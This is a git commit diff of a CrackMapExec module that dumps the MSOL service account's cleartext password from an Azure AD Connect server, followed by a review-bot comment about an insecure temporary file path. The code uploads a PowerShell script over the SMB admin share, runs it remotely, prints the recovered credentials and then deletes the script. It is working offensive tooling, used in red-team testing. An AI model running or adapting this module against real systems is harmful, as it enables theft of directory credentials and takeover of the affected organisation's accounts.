update msol module logging
parent
083550846a
commit
edb85f382e
|
@ -1,79 +1,88 @@
|
||||||
# MSOL module for CME
|
# MSOL module for CME
|
||||||
# Author of the module : https://twitter.com/Daahtk
|
# Author of the module : https://twitter.com/Daahtk
|
||||||
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
|
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
|
||||||
|
|
||||||
from base64 import b64decode
|
|
||||||
from sys import exit
|
from sys import exit
|
||||||
from os import path
|
from os import path
|
||||||
|
from cme.helpers.powershell import get_ps_script
|
||||||
|
|
||||||
|
|
||||||
class CMEModule:
|
class CMEModule:
|
||||||
|
name = "msol"
|
||||||
|
description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server"
|
||||||
|
supported_protocols = ["smb"]
|
||||||
|
opsec_safe = True
|
||||||
|
multiple_hosts = True
|
||||||
|
|
||||||
name = 'msol'
|
def __init__(self, context=None, module_options=None):
|
||||||
description = 'Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server'
|
self.use_embedded = None
|
||||||
supported_protocols = ['smb']
|
self.MSOL_PS1 = None
|
||||||
opsec_safe = True
|
self.msol_embedded = None
|
||||||
multiple_hosts = True
|
self.cmd = None
|
||||||
|
self.msolmdl = None
|
||||||
|
self.msol = None
|
||||||
|
self.tmp_share = None
|
||||||
|
self.share = None
|
||||||
|
self.tmp_dir = None
|
||||||
|
self.context = context
|
||||||
|
self.module_options = module_options
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
'''
|
"""
|
||||||
MSOL_PS1 // Path to the msol binary on your computer
|
MSOL_PS1 // Path to the msol binary on your computer
|
||||||
'''
|
"""
|
||||||
|
self.tmp_dir = "C:\\Windows\\Temp\\"
|
||||||
|
self.share = "C$"
|
||||||
|
self.tmp_share = self.tmp_dir.split(":")[1]
|
||||||
|
self.msol = "msol.ps1"
|
||||||
|
self.use_embedded = True
|
||||||
|
self.msolmdl = self.cmd = ""
|
||||||
|
|
||||||
self.tmp_dir = "C:\\Windows\\Temp\\"
|
with open(get_ps_script('msol_dump/msol_dump.ps1'), 'r') as msolsc:
|
||||||
self.share = "C$"
|
self.msol_embedded = msolsc.read()
|
||||||
self.tmp_share = self.tmp_dir.split(":")[1]
|
|
||||||
self.msol = "msol.ps1"
|
|
||||||
self.useembeded = True
|
|
||||||
self.msolmdl = self.cmd = ""
|
|
||||||
|
|
||||||
with open(get_ps_script('msol_dump/msol_dump.ps1'), 'r') as msolsc:
|
if "MSOL_PS1" in module_options:
|
||||||
self.msol_embedded = msolsc.read()
|
self.MSOL_PS1 = module_options["MSOL_PS1"]
|
||||||
|
self.use_embedded = False
|
||||||
|
|
||||||
if "MSOL_PS1" in module_options:
|
def exec_script(self, _, connection):
|
||||||
self.MSOL_PS1 = module_options["MSOL_PS1"]
|
|
||||||
self.useembeded = False
|
|
||||||
|
|
||||||
|
|
||||||
def execscript(self, _, connection):
|
|
||||||
command = f"C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe {self.tmp_dir}msol.ps1"
|
command = f"C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe {self.tmp_dir}msol.ps1"
|
||||||
return connection.execute(command, True)
|
return connection.execute(command, True)
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
|
||||||
|
|
||||||
if self.useembeded:
|
def on_admin_login(self, context, connection):
|
||||||
|
if self.use_embedded:
|
||||||
file_to_upload = "/tmp/msol.ps1"
|
file_to_upload = "/tmp/msol.ps1"
|
||||||
with open(file_to_upload, 'w') as msol:
|
with open(file_to_upload, 'w') as msol:
|
||||||
msol.write(self.msol_embedded)
|
msol.write(self.msol_embedded)
|
||||||
else:
|
else:
|
||||||
if path.isfile(self.MSOL_PS1):
|
if path.isfile(self.MSOL_PS1):
|
||||||
file_to_upload = self.MSOL_PS1
|
file_to_upload = self.MSOL_PS1
|
||||||
else:
|
else:
|
||||||
context.log.error(f"Cannot open {self.MSOL_PS1}")
|
context.log.fail(f"Cannot open {self.MSOL_PS1}")
|
||||||
exit(1)
|
exit(1)
|
||||||
|
|
||||||
context.log.display(f"Uploading {self.msol}")
|
context.log.display(f"Uploading {self.msol}")
|
||||||
with open(file_to_upload, 'rb') as msol:
|
with open(file_to_upload, 'rb') as msol:
|
||||||
try:
|
try:
|
||||||
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
|
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
|
||||||
context.log.success(f"Msol script successfully uploaded")
|
context.log.success(f"Msol script successfully uploaded")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.error(f"Error writing file to share {self.tmp_share}: {e}")
|
context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
|
||||||
return
|
return
|
||||||
try:
|
try:
|
||||||
if self.cmd == "":
|
if self.cmd == "":
|
||||||
context.log.display(f"Executing the script")
|
context.log.display(f"Executing the script")
|
||||||
p = self.execscript(context, connection)
|
p = self.exec_script(context, connection)
|
||||||
for line in p.splitlines():
|
for line in p.splitlines():
|
||||||
p1, p2 = line.split(" ", 1)
|
p1, p2 = line.split(" ", 1)
|
||||||
context.log.highlight(f"{p1} {p2}")
|
context.log.highlight(f"{p1} {p2}")
|
||||||
else :
|
else:
|
||||||
context.log.error(f"Script Execution Impossible")
|
context.log.fail(f"Script Execution Impossible")
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.error(f"Error runing command: {e}")
|
context.log.fail(f"Error running command: {e}")
|
||||||
finally:
|
finally:
|
||||||
try:
|
try:
|
||||||
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
|
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
|
||||||
context.log.success(f"Msol script successfully deleted")
|
context.log.success(f"Msol script successfully deleted")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.error(f"Error deleting msol script on {self.share}: {e}")
|
context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}")
|
||||||
|
|
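Review bot: The embedded-script branch of `on_admin_login` still stages the script at the fixed path `/tmp/msol.ps1`, which this commit leaves as is while renaming the flag that guards it. A predictable name in a shared `/tmp` is the insecure-temp-file pattern (CWE-377): `open(file_to_upload, 'w')` follows a pre-existing symlink, and the content can change before the later `open(file_to_upload, 'rb')` reads it back for upload. Because `multiple_hosts = True`, runs against several hosts also share that one file, so if hosts are processed concurrently one run can truncate it while another is reading; the local copy is never removed either. The script is already in memory, so the embedded case could skip the disk by passing `BytesIO(self.msol_embedded.encode()).read` as the `putFile` callback (with `from io import BytesIO`), keeping the `open(..., 'rb')` path only for a user-supplied `MSOL_PS1`.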